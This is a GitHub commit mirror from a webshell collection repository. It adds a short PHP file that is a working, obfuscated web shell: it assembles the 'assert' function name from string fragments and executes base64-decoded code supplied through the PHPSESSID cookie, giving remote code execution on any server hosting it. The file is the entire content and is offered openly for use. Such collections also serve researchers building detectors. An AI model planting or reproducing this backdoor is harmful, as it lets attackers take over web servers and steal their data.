1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
tennc
2022-09-09 23:08:35 +08:00
committed by GitHub
parent f940970766
commit f06a40760e

9
php/2022-09-0901.php Normal file
View File

@@ -0,0 +1,9 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c(base64_decode($_COOKIE["PHPSESSID"]));
?>